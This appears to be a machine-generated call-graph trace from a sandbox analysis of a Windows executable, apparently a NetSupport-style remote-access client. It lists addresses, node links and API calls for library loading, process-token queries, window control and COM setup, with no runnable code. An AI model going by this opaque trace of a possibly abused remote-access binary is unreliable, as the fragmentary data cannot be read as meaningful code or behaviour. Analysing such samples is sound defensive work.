110897c3 57955->57959 57956->57955 57958 11142290 std::locale::facet::_Facet_Register 307 API calls 57956->57958 57957->57959 57958->57955 57960 1102a620 std::locale::facet::_Facet_Register 174 API calls 57959->57960 57972 11089874 57959->57972 57962 11089813 57960->57962 57961 11161d01 __87except 5 API calls 57963 11089962 57961->57963 57964 11142290 std::locale::facet::_Facet_Register 307 API calls 57962->57964 57963->57938 57965 1108981b 57964->57965 57966 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 57965->57966 57967 11089832 57966->57967 57968 11081bb0 115 API calls 57967->57968 57967->57972 57969 1108984a 57968->57969 57970 1108988e 57969->57970 57971 11089851 57969->57971 57973 11081bb0 115 API calls 57970->57973 57983 110b75d0 57971->57983 57972->57961 57975 11089899 57973->57975 57975->57972 57977 110b75d0 69 API calls 57975->57977 57979 110898a6 57977->57979 57978 110b75d0 69 API calls 57978->57972 57979->57972 57980 110b75d0 69 API calls 57979->57980 57980->57972 57981->57946 57982->57953 57986 110b75b0 57983->57986 57989 111672e3 57986->57989 57992 11167264 57989->57992 57993 11167271 57992->57993 57994 1116728b 57992->57994 58010 11169302 67 API calls __getptd_noexit 57993->58010 57994->57993 57996 11167294 GetFileAttributesA 57994->57996 57998 111672a2 GetLastError 57996->57998 58000 111672b8 57996->58000 57997 11167276 58011 111692ef 67 API calls __getptd_noexit 57997->58011 58013 11169315 67 API calls 3 library calls 57998->58013 57999 11089857 57999->57972 57999->57978 58000->57999 58015 11169302 67 API calls __getptd_noexit 58000->58015 58003 1116727d 58012 1116df04 11 API calls __filbuf 58003->58012 58004 111672ae 58014 111692ef 67 API calls __getptd_noexit 58004->58014 58008 111672cb 58016 111692ef 67 API calls __getptd_noexit 58008->58016 58010->57997 58011->58003 58012->57999 58013->58004 58014->57999 58015->58008 58016->58004 58017 110facc0 GetTokenInformation 58018 110fad08 58017->58018 58019 110facf7 58017->58019 58027 110f1f50 9 API calls 58018->58027 58021 11161d01 __87except 5 API calls 58019->58021 58023 110fad04 58021->58023 58022 110fad2c 58022->58019 58024 110fad34 58022->58024 58025 11161d01 __87except 5 API calls 58024->58025 58026 110fad5a 58025->58026 58027->58022 58028 f01020 GetCommandLineA 58029 f01035 GetStartupInfoA 58028->58029 58031 f01090 GetModuleHandleA 58029->58031 58032 f0108b 58029->58032 58035 f01000 _NSMClient32 58031->58035 58032->58031 58034 f010a2 ExitProcess 58035->58034 58036 111071e0 58037 111071ec 58036->58037 58038 1110721d 58037->58038 58039 111450a0 std::locale::facet::_Facet_Register 121 API calls 58037->58039 58083 11106100 320 API calls std::locale::facet::_Facet_Register 58038->58083 58041 11107201 58039->58041 58041->58038 58046 111062e0 58041->58046 58042 11107223 58045 11107218 58084 11163180 58046->58084 58048 111062fb LoadLibraryA 58095 11137340 10 API calls 2 library calls 58048->58095 58050 11106361 58051 11106365 58050->58051 58052 1110637d 58050->58052 58051->58052 58053 1110636a 58051->58053 58054 111450a0 std::locale::facet::_Facet_Register 121 API calls 58052->58054 58055 11106375 58053->58055 58056 1110636e FreeLibrary 58053->58056 58057 11106386 58054->58057 58060 11161d01 __87except 5 API calls 58055->58060 58056->58055 58058 111063a1 LoadLibraryA GetProcAddress 58057->58058 58059 11106397 58057->58059 58061 111064d1 SetLastError 58058->58061 58071 11106443 58058->58071 58059->58058 58062 11106665 58060->58062 58063 1110660f 58061->58063 58062->58038 58062->58045 58064 111450a0 std::locale::facet::_Facet_Register 121 API calls 58063->58064 58065 11106624 58064->58065 58066 11106635 FreeLibrary 58065->58066 58067 1110663c 58065->58067 58066->58067 58067->58055 58068 11106640 FreeLibrary 58067->58068 58068->58055 58069 111064f2 OpenProcess 58069->58071 58076 11106497 58069->58076 58070 111064a5 GetProcAddress 58072 111064de SetLastError 58070->58072 58070->58076 58071->58063 58071->58069 58071->58076 58085 11025d00 58071->58085 58072->58076 58074 111065e5 CloseHandle 58074->58063 58074->58076 58075 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 58075->58076 58076->58063 58076->58069 58076->58070 58076->58071 58076->58074 58076->58075 58077 11081bb0 115 API calls 58076->58077 58078 11106556 OpenProcessToken 58076->58078 58079 11106574 GetTokenInformation 58076->58079 58080 111065d8 CloseHandle 58076->58080 58096 11106100 320 API calls std::locale::facet::_Facet_Register 58076->58096 58097 110f5e90 25 API calls std::locale::facet::_Facet_Register 58076->58097 58077->58076 58078->58074 58078->58076 58079->58076 58079->58080 58080->58074 58083->58042 58084->58048 58086 11025d0e GetProcAddress 58085->58086 58087 11025d1f 58085->58087 58086->58087 58088 11025d38 58087->58088 58089 11025d2c K32GetProcessImageFileNameA 58087->58089 58091 11025d3e GetProcAddress 58088->58091 58092 11025d4f 58088->58092 58089->58088 58090 11025d71 58089->58090 58090->58076 58091->58092 58093 11025d56 58092->58093 58094 11025d67 SetLastError 58092->58094 58093->58076 58094->58090 58095->58050 58096->58076 58097->58076 58098 110173f0 GetTickCount 58105 11017300 58098->58105 58103 11146450 std::locale::facet::_Facet_Register 21 API calls 58104 11017437 58103->58104 58106 11017320 58105->58106 58113 110173d6 58105->58113 58108 11017342 CoInitialize _GetRawWMIStringW 58106->58108 58111 11017339 WaitForSingleObject 58106->58111 58107 11161d01 __87except 5 API calls 58110 110173e5 58107->58110 58109 110173c2 58108->58109 58114 11017375 58108->58114 58112 110173d0 CoUninitialize 58109->58112 58109->58113 58118 11017220 58110->58118 58111->58108 58112->58113 58113->58107 58114->58109 58115 110173bc 58114->58115 58117 11163a2d std::locale::facet::_Facet_Register 106 API calls 58114->58117 58131 11163837 __fassign 58115->58131 58117->58114 58119 11017240 58118->58119 58126 110172e6 58118->58126 58120 11017258 CoInitialize _GetRawWMIStringW 58119->58120 58122 1101724f WaitForSingleObject 58119->58122 58123 110172d2 58120->58123 58127 1101728b 58120->58127 58121 11161d01 __87except 5 API calls 58124 110172f5 SetEvent GetTickCount 58121->58124 58122->58120 58125 110172e0 CoUninitialize 58123->58125 58123->58126 58124->58103 58125->58126 58126->58121 58127->58123 58128 110172cc 58127->58128 58130 11163a2d std::locale::facet::_Facet_Register 106 API calls 58127->58130 58132 11163837 __fassign 58128->58132 58130->58127 58131->58109 58132->58123 58133 11025cd0 LoadLibraryA 58134 1113cd60 58135 1113cd69 58134->58135 58136 1113cd6e 58134->58136 58138 11139090 58135->58138 58139 111390d2 58138->58139 58140 111390c7 GetCurrentThreadId 58138->58140 58141 111390e0 58139->58141 58257 11029330 58139->58257 58140->58139 58264 11133920 58141->58264 58147 111391d1 58151 11139202 FindWindowA 58147->58151 58157 1113929a 58147->58157 58148 11161d01 __87except 5 API calls 58152 11139772 58148->58152 58150 1113911c IsWindow IsWindowVisible 58153 11146450 std::locale::facet::_Facet_Register 21 API calls 58150->58153 58154 11139217 IsWindowVisible 58151->58154 58151->58157 58152->58136 58155 11139147 58153->58155 58156 1113921e 58154->58156 58154->58157 58158 1105dd10 106 API calls 58155->58158 58156->58157 58162 11138c30 385 API calls 58156->58162 58159 1105dd10 106 API calls 58157->58159 58229 111392bf 58157->58229 58161 11139163 IsWindowVisible 58158->58161 58174 111392e7 58159->58174 58160 1105dd10 106 API calls 58171 1113945f 58160->58171 58161->58147 58163 11139171 58161->58163 58165 1113923f IsWindowVisible 58162->58165 58163->58147 58166 11139179 58163->58166 58164 11138c30 385 API calls 58167 1113948a 58164->58167 58165->58157 58168 1113924e IsIconic 58165->58168 58172 11146450 std::locale::facet::_Facet_Register 21 API calls 58166->58172 58170 111394a7 58167->58170 58488 1106b860 323 API calls 58167->58488 58168->58157 58173 1113925f GetForegroundWindow 58168->58173 58175 111394b4 58170->58175 58176 111394bd 58170->58176 58171->58164 58171->58167 58177 11139183 GetForegroundWindow 58172->58177 58486 11131210 176 API calls 58173->58486 58179 11139334 58174->58179 58180 11081a70 IsDBCSLeadByte 58174->58180 58174->58229 58489 11131b00 117 API calls 2 library calls 58175->58489 58182 111394d4 58176->58182 58183 111394c8 58176->58183 58185 11139192 EnableWindow 58177->58185 58186 111391be 58177->58186 58184 11143230 std::locale::facet::_Facet_Register 8 API calls 58179->58184 58180->58179 58491 111317a0 325 API calls std::locale::facet::_Facet_Register 58182->58491 58189 111394d9 58183->58189 58190 111394cd 58183->58190 58191 11139346 58184->58191 58484 11131210 176 API calls 58185->58484 58186->58147 58195 111391ca SetForegroundWindow 58186->58195 58187 1113926e 58487 11131210 176 API calls 58187->58487 58188 111394ba 58188->58176 58199 11139599 58189->58199 58205 111394f1 58189->58205 58231 1113959b 58189->58231 58490 11131870 325 API calls std::locale::facet::_Facet_Register 58190->58490 58198 11139353 GetLastError 58191->58198 58211 11139361 58191->58211 58195->58147 58196 11139275 58202 1113928b EnableWindow 58196->58202 58207 11139284 SetForegroundWindow 58196->58207 58204 11146450 std::locale::facet::_Facet_Register 21 API calls 58198->58204 58201 111386b0 350 API calls 58199->58201 58200 111391a9 58485 11131210 176 API calls 58200->58485 58220 111395ee 58201->58220 58202->58157 58203 111394d2 58203->58189 58204->58211 58205->58199 58213 1110f420 std::locale::facet::_Facet_Register 307 API calls 58205->58213 58207->58202 58208 111391b0 EnableWindow 58208->58186 58209 11139615 58210 1113974a 58209->58210 58221 1105dd10 106 API calls 58209->58221 58210->58148 58212 111393b2 58211->58212 58216 11081a70 IsDBCSLeadByte 58211->58216 58211->58229 58215 11143230 std::locale::facet::_Facet_Register 8 API calls 58212->58215 58214 11139512 58213->58214 58217 11139544 58214->58217 58218 11139524 58214->58218 58219 111393c4 58215->58219 58216->58212 58493 1110f260 InterlockedIncrement 58217->58493 58492 110573b0 323 API calls std::locale::facet::_Facet_Register 58218->58492 58223 111393cb GetLastError 58219->58223 58219->58229 58220->58209 58404 11142210 58220->58404 58225 11139645 58221->58225 58227 11146450 std::locale::facet::_Facet_Register 21 API calls 58223->58227 58225->58210 58233 11139662 58225->58233 58234 1113968d 58225->58234 58226 11139533 58226->58217 58227->58229 58229->58160 58229->58171 58230 11139558 58494 1104e340 315 API calls 58230->58494 58231->58199 58497 1110f270 InterlockedDecrement 58231->58497 58235 1113966a 58233->58235 58236 11139699 GetTickCount 58233->58236 58234->58210 58234->58236 58238 11146450 std::locale::facet::_Facet_Register 21 API calls 58235->58238 58236->58210 58239 111396ab 58236->58239 58241 11139675 GetTickCount 58238->58241 58242 11142e80 174 API calls 58239->58242 58240 1113956e 58495 1104e3b0 315 API calls 58240->58495 58241->58210 58244 111396b7 58242->58244 58245 11146ee0 309 API calls 58244->58245 58246 111396c2 58245->58246 58248 11142e80 174 API calls 58246->58248 58247 11139579 58247->58199 58496 110ebf30 331 API calls 58247->58496 58250 111396d5 58248->58250 58498 11025bb0 LoadLibraryA 58250->58498 58252 111396e2 58252->58252 58499 1112c7a0 GetProcAddress SetLastError 58252->58499 58254 11139729 58255 11139733 FreeLibrary 58254->58255 58256 1113973a 58254->58256 58255->58256 58256->58210 58500 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 58257->58500 58259 1102933e 58260 11029353 58259->58260 58501 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 58259->58501 58502 11089cc0 311 API calls std::locale::facet::_Facet_Register 58260->58502 58263 1102935e 58263->58141 58265 11133962 58264->58265 58266 11133c84 58264->58266 58268 1105dd10 106 API calls 58265->58268 58267 11161d01 __87except 5 API calls 58266->58267 58269 11133c9c 58267->58269 58270 11133982 58268->58270 58312 11133400 58269->58312 58270->58266 58271 1113398a GetLocalTime 58270->58271 58272 111339c1 LoadLibraryA 58271->58272 58273 111339a0 58271->58273 58503 110098c0 LoadLibraryA 58272->58503 58275 11146450 std::locale::facet::_Facet_Register 21 API calls 58273->58275 58277 111339b5 58275->58277 58276 11133a15 58504 11015c30 LoadLibraryA 58276->58504 58277->58272 58279 11133a20 GetCurrentProcess 58280 11133a45 GetProcAddress 58279->58280 58281 11133a5d GetProcessHandleCount 58279->58281 58280->58281 58282 11133a66 SetLastError 58280->58282 58283 11133a6e 58281->58283 58282->58283 58284 11133a92 58283->58284 58285 11133a78 GetProcAddress 58283->58285 58287 11133aa0 GetProcAddress 58284->58287 58288 11133aba 58284->58288 58285->58284 58286 11133ac7 SetLastError 58285->58286 58286->58287 58287->58288 58289 11133ad4 SetLastError 58287->58289 58290 11133adf GetProcAddress 58288->58290 58289->58290 58291 11133af1 K32GetProcessMemoryInfo 58290->58291 58292 11133aff SetLastError 58290->58292 58293 11133b07 58291->58293 58292->58293 58294 11146450 std::locale::facet::_Facet_Register 21 API calls 58293->58294 58296 11133b7d 58293->58296 58294->58296 58295 11133c5a 58297 11133c6a FreeLibrary 58295->58297 58298 11133c6d 58295->58298 58296->58295 58302 1105dd10 106 API calls 58296->58302 58297->58298 58299 11133c77 FreeLibrary 58298->58299 58300 11133c7a 58298->58300 58299->58300 58300->58266 58301 11133c81 FreeLibrary 58300->58301 58301->58266 58303 11133bce 58302->58303 58304 1105dd10 106 API calls 58303->58304 58305 11133bf6 58304->58305 58306 1105dd10 106 API calls 58305->58306 58307 11133c1d 58306->58307 58308 1105dd10 106 API calls 58307->58308 58309 11133c44 58308->58309 58309->58295 58310 11133c55 58309->58310 58505 11027780 307 API calls 2 library calls 58310->58505 58314 1113342d 58312->58314 58313 111338e9 58313->58147 58313->58210 58408 11138c30 58313->58408 58314->58313 58315 110d1550 307 API calls 58314->58315 58316 1113348e 58315->58316 58317 110d1550 307 API calls 58316->58317 58318 11133499 58317->58318 58319 111334c7 58318->58319 58320 111334de 58318->58320 58506 11029450 307 API calls 2 library calls 58319->58506 58322 11146450 std::locale::facet::_Facet_Register 21 API calls 58320->58322 58324 111334ec 58322->58324 58325 11133505 58324->58325 58326 1113351c 58324->58326 58507 11029450 307 API calls 2 library calls 58325->58507 58327 11081bb0 115 API calls 58326->58327 58330 1113352a 58327->58330 58331 11133541 58330->58331 58508 11009450 307 API calls std::locale::facet::_Facet_Register 58330->58508 58333 11146450 std::locale::facet::_Facet_Register 21 API calls 58331->58333 58337 111335e5 58331->58337 58335 11133556 58333->58335 58334 1113353b 58336 11081a70 IsDBCSLeadByte 58334->58336 58335->58337 58339 11146450 std::locale::facet::_Facet_Register 21 API calls 58335->58339 58336->58331 58338 11146450 std::locale::facet::_Facet_Register 21 API calls 58337->58338 58353 1113368e 58337->58353 58348 111335f7 58338->58348 58340 11133580 58339->58340 58509 110ed7a0 RegCloseKey 58340->58509 58342 11133598 58510 110ed430 311 API calls 2 library calls 58342->58510 58343 110ed1a0 2 API calls 58343->58348 58345 111335a9 58511 1102a0b0 307 API calls std::locale::facet::_Facet_Register 58345->58511 58348->58343 58349 1113365b 58348->58349 58348->58353 58513 110ed430 311 API calls 2 library calls 58348->58513 58349->58348 58514 11029450 307 API calls 2 library calls 58349->58514 58350 111335b3 58351 111335ca 58350->58351 58354 11146450 std::locale::facet::_Facet_Register 21 API calls 58350->58354 58351->58337 58512 1102a0b0 307 API calls std::locale::facet::_Facet_Register 58351->58512 58356 111336c1 58353->58356 58357 111336aa 58353->58357 58354->58351 58359 111336be 58356->58359 58362 111336ec 58356->58362 58365 11133725 58356->58365 58515 11029450 307 API calls 2 library calls 58357->58515 58359->58356 58516 11029450 307 API calls 2 library calls 58359->58516 58360 111337cc 58367 11133816 58360->58367 58368 111337ff 58360->58368 58361 11133780 _free 58363 11133798 58361->58363 58366 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 58362->58366 58370 111337b3 58363->58370 58371 1113379c 58363->58371 58365->58360 58365->58361 58373 11133722 58365->58373 58374 11133769 58365->58374 58375 111336f7 58366->58375 58376 11133813 58367->58376 58388 11133845 58367->58388 58396 111338a1 58367->58396 58520 11029450 307 API calls 2 library calls 58368->58520 58378 11163cf8 __strdup 67 API calls 58370->58378 58519 11029450 307 API calls 2 library calls 58371->58519 58373->58365 58518 11029450 307 API calls 2 library calls 58373->58518 58380 11081bb0 115 API calls 58374->58380 58375->58365 58392 1113370e 58375->58392 58376->58367 58521 11029450 307 API calls 2 library calls 58376->58521 58383 111337bc 58378->58383 58385 11133779 58380->58385 58381 110d07c0 308 API calls 58386 111338da 58381->58386 58389 11146450 std::locale::facet::_Facet_Register 21 API calls 58383->58389 58385->58360 58385->58361 58387 110d07c0 308 API calls 58386->58387 58387->58313 58391 11081bb0 115 API calls 58388->58391 58389->58360 58394 11133853 58391->58394 58517 11029450 307 API calls 2 library calls 58392->58517 58394->58396 58397 11133868 58394->58397 58398 1113387f 58394->58398 58396->58381 58522 11029450 307 API calls 2 library calls 58397->58522 58400 11081a70 IsDBCSLeadByte 58398->58400 58402 1113388a 58400->58402 58402->58396 58523 11009450 307 API calls std::locale::facet::_Facet_Register 58402->58523 58405 1114222f 58404->58405 58406 1114221a 58404->58406 58405->58209 58524 11141890 58406->58524 58409 1113906f 58408->58409 58412 11138c4d 58408->58412 58410 11161d01 __87except 5 API calls 58409->58410 58411 1113907e 58410->58411 58411->58150 58412->58409 58413 111450a0 std::locale::facet::_Facet_Register 121 API calls 58412->58413 58414 11138c8c 58413->58414 58414->58409 58415 1105dd10 106 API calls 58414->58415 58416 11138cbb 58415->58416 58644 1112c920 58416->58644 58418 11138e00 PostMessageA 58420 11138e15 58418->58420 58419 1105dd10 106 API calls 58421 11138dfc 58419->58421 58422 11138e25 58420->58422 58653 1110f270 InterlockedDecrement 58420->58653 58421->58418 58421->58420 58424 11138e2b 58422->58424 58425 11138e4d 58422->58425 58427 11138e83 58424->58427 58428 11138e9e 58424->58428 58654 11130410 329 API calls std::locale::facet::_Facet_Register 58425->58654 58433 11161d01 __87except 5 API calls 58427->58433 58429 11142e80 174 API calls 58428->58429 58431 11138ea3 58429->58431 58432 11146ee0 309 API calls 58431->58432 58434 11138eaa SetWindowTextA 58432->58434 58435 11138e9a 58433->58435 58436 11138ec6 58434->58436 58445 11138ecd 58434->58445 58435->58150 58655 111352b0 338 API calls 4 library calls 58436->58655 58437 11145b40 4 API calls 58439 11138dab 58437->58439 58439->58418 58439->58419 58440 11138e55 58440->58424 58441 11138f24 58442 11138f38 58441->58442 58443 11138ffc 58441->58443 58448 11138f5c 58442->58448 58658 111352b0 338 API calls 4 library calls 58442->58658 58446 1113901d 58443->58446 58451 1113900b 58443->58451 58452 11139004 58443->58452 58444 11138ef7 58444->58441 58447 11138f0c 58444->58447 58445->58441 58445->58444 58656 111352b0 338 API calls 4 library calls 58445->58656 58664 110f8640 116 API calls 58446->58664 58657 11131210 176 API calls 58447->58657 58660 110f8640 116 API calls 58448->58660 58663 11131210 176 API calls 58451->58663 58662 111352b0 338 API calls 4 library calls 58452->58662 58455 11138f67 58455->58409 58461 11138f6f IsWindowVisible 58455->58461 58457 11138f1c 58457->58441 58459 11139028 58459->58409 58463 1113902c IsWindowVisible 58459->58463 58461->58409 58465 11138f86 58461->58465 58462 1113901a 58462->58446 58463->58409 58466 1113903e IsWindowVisible 58463->58466 58464 11138f46 58464->58448 58467 11138f52 58464->58467 58468 111450a0 std::locale::facet::_Facet_Register 121 API calls 58465->58468 58466->58409 58469 1113904b EnableWindow 58466->58469 58659 11131210 176 API calls 58467->58659 58471 11138f91 58468->58471 58665 11131210 176 API calls 58469->58665 58471->58409 58474 11138f9c GetForegroundWindow IsWindowVisible 58471->58474 58473 11138f59 58473->58448 58476 11138fc1 58474->58476 58477 11138fb6 EnableWindow 58474->58477 58475 11139062 EnableWindow 58475->58409 58661 11131210 176 API calls 58476->58661 58477->58476 58479 11138fc8 58480 11138fde EnableWindow 58479->58480 58481 11138fd7 SetForegroundWindow 58479->58481 58482 11161d01 __87except 5 API calls 58480->58482 58481->58480 58483 11138ff8 58482->58483 58483->58150 58484->58200 58485->58208 58486->58187 58487->58196 58488->58170 58489->58188 58490->58203 58491->58189 58492->58226 58493->58230 58494->58240 58495->58247 58496->58199 58497->58199 58498->58252 58499->58254 58500->58259 58501->58259 58502->58263 58503->58276 58504->58279 58505->58295 58508->58334 58509->58342 58510->58345 58511->58350 58512->58337 58513->58348 58523->58396 58525 111418cf 58524->58525 58526 111418c8 58524->58526 58527 1110f420 std::locale::facet::_Facet_Register 307 API calls 58525->58527 58528 11161d01 __87except 5 API calls 58526->58528 58530 111418d6 58527->58530 58529 1114220a 58528->58529 58529->58405 58531 11061700 124 API calls 58530->58531 58532 11141942 58531->58532 58533 11141949 RegCloseKey 58532->58533 58534 11141950 58532->58534 58533->58534 58535 11143230 std::locale::facet::_Facet_Register 8 API calls 58534->58535 58536 11141980 58535->58536 58537 11141997 58536->58537 58538 11062d60 353 API calls 58536->58538 58539 1110f420 std::locale::facet::_Facet_Register 307 API calls 58537->58539 58538->58537 58540 1114199e 58539->58540 58541 1110f420 std::locale::facet::_Facet_Register 307 API calls 58540->58541 58542 111419d3 58541->58542 58543 1110f420 std::locale::facet::_Facet_Register 307 API calls 58542->58543 58544 11141a08 58543->58544 58545 11060760 311 API calls 58544->58545 58546 11141a4d 58545->58546 58547 11060760 311 API calls 58546->58547 58578 11141a67 58547->58578 58548 11141d95 58550 110d1550 307 API calls 58548->58550 58552 11142179 58548->58552 58549 110607f0 317 API calls 58549->58578 58551 11141db3 58550->58551 58557 1105dd10 106 API calls 58551->58557 58642 11060640 73 API calls 58552->58642 58553 11141d85 58554 11146450 std::locale::facet::_Facet_Register 21 API calls 58553->58554 58554->58548 58555 11081bb0 115 API calls 58555->58578 58556 11146450 21 API calls std::locale::facet::_Facet_Register 58556->58578 58558 11141df0 58557->58558 58561 11060760 311 API calls 58558->58561 58565 11141f3d 58558->58565 58560 111421d2 58643 11060640 73 API calls 58560->58643 58564 11141e0e 58561->58564 58563 111319f0 115 API calls 58563->58578 58566 110607f0 317 API calls 58564->58566 58636 110679c0 323 API calls std::locale::facet::_Facet_Register 58565->58636 58571 11141e1d 58566->58571 58567 11141e52 58570 11060760 311 API calls 58567->58570 58569 11146450 std::locale::facet::_Facet_Register 21 API calls 58569->58571 58572 11141e68 58570->58572 58571->58567 58571->58569 58575 110607f0 317 API calls 58571->58575 58576 110607f0 317 API calls 58572->58576 58573 11141fb3 EnterCriticalSection 58574 11060420 314 API calls 58573->58574 58583 11141fd0 58574->58583 58575->58571 58590 11141e78 58576->58590 58577 11081c60 116 API calls std::locale::facet::_Facet_Register 58577->58578 58578->58548 58578->58549 58578->58553 58578->58555 58578->58556 58578->58563 58578->58577 58579 11141eb1 58580 11060760 311 API calls 58579->58580 58581 11141ec7 58580->58581 58586 110607f0 317 API calls 58581->58586 58582 11141ffa LeaveCriticalSection 58588 1114204e 58582->58588 58589 1114200e 58582->58589 58583->58582 58587 1102a9f0 324 API calls 58583->58587 58584 11146450 std::locale::facet::_Facet_Register 21 API calls 58584->58590 58585 11141f83 58585->58573 58637 110679c0 323 API calls std::locale::facet::_Facet_Register 58585->58637 58605 11141ed6 58586->58605 58592 11141ff7 58587->58592 58593 11133400 315 API calls 58588->58593 58589->58588 58597 11146450 std::locale::facet::_Facet_Register 21 API calls 58589->58597 58590->58579 58590->58584 58594 110607f0 317 API calls 58590->58594 58592->58582 58596 11142058 58593->58596 58594->58590 58595 11141f11 58633 11060640 73 API calls 58595->58633 58598 110d1550 307 API calls 58596->58598 58600 1114201c 58597->58600 58602 11142066 58598->58602 58604 1113cc30 342 API calls 58600->58604 58601 11146450 std::locale::facet::_Facet_Register 21 API calls 58601->58605 58638 110cff20 307 API calls std::locale::facet::_Facet_Register 58602->58638 58603 11141f1f 58634 11060640 73 API calls 58603->58634 58607 11142021 58604->58607 58605->58595 58605->58601 58609 110607f0 317 API calls 58605->58609 58608 111414a0 842 API calls 58607->58608 58612 11142027 58608->58612 58609->58605 58610 11141f2e 58635 11060640 73 API calls 58610->58635 58612->58588 58614 11146450 std::locale::facet::_Facet_Register 21 API calls 58612->58614 58615 11142040 58614->58615 58618 11026ba0 357 API calls 58615->58618 58616 110d07c0 308 API calls 58619 1114215b 58616->58619 58617 1114209c 58620 111420c3 58617->58620 58621 111420da 58617->58621 58627 1114211f 58617->58627 58618->58588 58622 110d07c0 308 API calls 58619->58622 58639 11029450 307 API calls 2 library calls 58620->58639 58624 11081bb0 115 API calls 58621->58624 58622->58552 58626 111420eb 58624->58626 58626->58627 58640 11009450 307 API calls std::locale::facet::_Facet_Register 58626->58640 58627->58616 58629 111420ff 58630 11081a70 IsDBCSLeadByte 58629->58630 58631 11142105 58630->58631 58631->58627 58641 11009450 307 API calls std::locale::facet::_Facet_Register 58631->58641 58633->58603 58634->58610 58635->58565 58636->58585 58637->58585 58638->58617 58640->58629 58641->58627 58642->58560 58643->58526 58645 1112c93c 58644->58645 58646 1112c977 58645->58646 58647 1112c964 58645->58647 58666 1106b860 323 API calls 58646->58666 58650 11146ee0 309 API calls 58647->58650 58649 1112c96f 58651 1112c9c3 58649->58651 58652 11142290 std::locale::facet::_Facet_Register 307 API calls 58649->58652 58650->58649 58651->58437 58651->58439 58652->58651 58653->58422 58654->58440 58655->58445 58656->58444 58657->58457 58658->58464 58659->58473 58660->58455 58661->58479 58662->58451 58663->58462 58664->58459 58665->58475 58666->58649 58667 11144200 58668 11144211 58667->58668 58681 11143c20 58668->58681 58672 11144295 58675 111442b2 58672->58675 58676 11144294 58672->58676 58673 1114425b 58674 11144262 ResetEvent 58673->58674 58689 11143de0 307 API calls 2 library calls 58674->58689 58676->58672 58690 11143de0 307 API calls 2 library calls 58676->58690 58679 11144276 SetEvent WaitForMultipleObjects 58679->58674 58679->58676 58680 111442af 58680->58675 58682 11143c2c GetCurrentProcess 58681->58682 58683 11143c4f 58681->58683 58682->58683 58684 11143c3d GetModuleFileNameA 58682->58684 58685 1110f420 std::locale::facet::_Facet_Register 305 API calls 58683->58685 58687 11143c79 WaitForMultipleObjects 58683->58687 58684->58683 58686 11143c6b 58685->58686 58686->58687 58691 11143570 GetModuleFileNameA 58686->58691 58687->58672 58687->58673 58689->58679 58690->58680 58692 111435b3 58691->58692 58694 111435f3 58691->58694 58693 11081b40 std::locale::facet::_Facet_Register IsDBCSLeadByte 58692->58693 58695 111435c1 58693->58695 58696 111435ff LoadLibraryA 58694->58696 58697 11143619 GetModuleHandleA GetProcAddress 58694->58697 58695->58694 58698 111435c8 LoadLibraryA 58695->58698 58696->58697 58699 1114360e LoadLibraryA 58696->58699 58700 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58697->58700 58701 11143639 58697->58701 58698->58694 58699->58697 58702 11143673 10 API calls 58700->58702 58701->58702 58703 11161d01 __87except 5 API calls 58702->58703 58704 111436f0 58703->58704 58704->58687 58705 1115bde0 58706 1115bdf4 58705->58706 58707 1115bdec 58705->58707 58716 111631ab 58706->58716 58710 1115be14 58711 1115bf40 58713 1115bf62 _free 58711->58713 58714 1115be31 58714->58711 58715 1115bf24 SetLastError 58714->58715 58715->58714 58717 11170166 _calloc 67 API calls 58716->58717 58718 111631c5 58717->58718 58719 1115be08 58718->58719 58740 111692ef 67 API calls __getptd_noexit 58718->58740 58719->58710 58719->58711 58723 1115ba20 CoInitializeSecurity CoCreateInstance 58719->58723 58721 111631d8 58721->58719 58741 111692ef 67 API calls __getptd_noexit 58721->58741 58724 1115ba95 wsprintfW SysAllocString 58723->58724 58725 1115bc14 58723->58725 58730 1115badb 58724->58730 58726 11161d01 __87except 5 API calls 58725->58726 58728 1115bc40 58726->58728 58727 1115bc01 SysFreeString 58727->58725 58728->58714 58729 1115bbe9 58729->58727 58730->58727 58730->58729 58730->58730 58731 1115bb6c 58730->58731 58732 1115bb5a wsprintfW 58730->58732 58742 110974a0 58731->58742 58732->58731 58734 1115bb7e 58735 110974a0 308 API calls 58734->58735 58736 1115bb93 58735->58736 58747 11097550 InterlockedDecrement SysFreeString 58736->58747 58738 1115bbd7 58748 11097550 InterlockedDecrement SysFreeString 58738->58748 58740->58721 58741->58719 58743 1110f420 std::locale::facet::_Facet_Register 307 API calls 58742->58743 58744 110974d3 58743->58744 58745 110974e6 SysAllocString 58744->58745 58746 11097504 58744->58746 58745->58746 58746->58734 58747->58738 58748->58729 58749 1116970d 58750 1116971d 58749->58750 58751 11169718 58749->58751 58755 11169617 58750->58755 58767 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 58751->58767 58754 1116972b 58756 11169623 __mtinitlocknum 58755->58756 58757 11169670 58756->58757 58764 111696c0 __mtinitlocknum 58756->58764 58768 111694b3 58756->58768 58757->58764 58814 11025e20 58757->58814 58760 11169683 58761 111696a0 58760->58761 58763 11025e20 ___DllMainCRTStartup 7 API calls 58760->58763 58762 111694b3 __CRT_INIT@12 157 API calls 58761->58762 58761->58764 58762->58764 58765 11169697 58763->58765 58764->58754 58766 111694b3 __CRT_INIT@12 157 API calls 58765->58766 58766->58761 58767->58750 58769 111694bf __mtinitlocknum 58768->58769 58770 111694c7 58769->58770 58771 11169541 58769->58771 58823 1116d4d0 HeapCreate 58770->58823 58772 11169547 58771->58772 58773 111695a2 58771->58773 58783 11169565 58772->58783 58796 111694d0 __mtinitlocknum 58772->58796 58869 1116d79b 67 API calls _doexit 58772->58869 58775 111695a7 58773->58775 58776 11169600 58773->58776 58778 1116b5fa ___set_flsgetvalue 3 API calls 58775->58778 58776->58796 58875 1116b8fe 117 API calls __freefls@4 58776->58875 58777 111694cc 58777->58796 58824 1116b96c GetModuleHandleW 58777->58824 58781 111695ac 58778->58781 58787 11169dbe __calloc_crt 67 API calls 58781->58787 58784 11169579 58783->58784 58870 1117140e DeleteCriticalSection _free 58783->58870 58873 1116958c 5 API calls __mtterm 58784->58873 58785 111694dc __RTC_Initialize 58790 111694e0 58785->58790 58797 111694ec GetCommandLineA ___crtGetEnvironmentStringsA 58785->58797 58791 111695b8 58787->58791 58789 1116956f 58871 1116b64b DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 58789->58871 58866 1116d4ee 